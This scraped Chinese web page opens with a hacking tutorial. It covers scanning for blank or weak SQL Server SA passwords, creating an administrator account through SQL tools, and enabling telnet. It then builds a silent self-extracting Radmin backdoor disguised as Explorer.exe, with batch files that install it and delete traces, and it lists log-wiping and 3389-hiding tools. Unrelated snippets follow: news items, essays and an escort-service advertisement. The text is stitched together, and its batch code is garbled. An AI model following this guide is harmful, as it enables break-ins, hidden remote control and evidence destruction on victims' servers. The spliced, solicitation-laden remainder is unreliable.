工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
*** RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4、编写一个批处理,并命名为u.bat;
@echo offnet stop r_server
5、写第二个批处理,r.bat,内容为:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar *** 成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
中新网1月17日电 综合报道,日前,韩国总统文在寅授予姜昌一国书,任命其为韩国新任驻日大使。17日,姜昌一以视频连线的形式召开记者会,表达了要致力于恢复韩日关系,加强两国合作的态度。 据韩媒...
济南商务陪伴小学妹联系方式,济南私人订制上门微信群【汝睿婕】 今天给大家分享的内容是“济南商务陪伴小学妹联系方式,济南私人订制上门微信群【汝睿婕】”,我是汝睿婕,来自天水市,今年26岁,作为职业:...
3天,甘肃3厅官被查 近几日,甘肃每天一个厅官,涉嫌严重违纪违法,接受甘肃省纪委监委纪律审查和监察调查: [原创文章:] 12月18日,甘肃省电力投资集团有限责任公司原党委书记、董事长李宁平; [原...
2018山東高考英語改造怎麼改讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。 部门省分高考改造新方案已經出臺,小編整理瞭有關2018山東高考英語改造方案的內容,供大傢參考。 1...
编辑导语:告白行业,门槛儿低,需求量大,于是告白人越来多。曾经“不做总统就做告白人”的光耀抱负逐渐惨淡,在互联网营销攻击下,寻求转型可能已经转型的告白人与日俱增。本日,本文作者就环绕这个话题,总结了一...
十一月你好(十一月你好的唯美句子) 今天是10月的最后一天,2020只剩六分之一。时光匆匆,岁月温柔,向着自己的生活前进。愿一切的努力都有结果, 愿所有的真情都不被辜负,愿你被岁月温柔以待, 愿所有...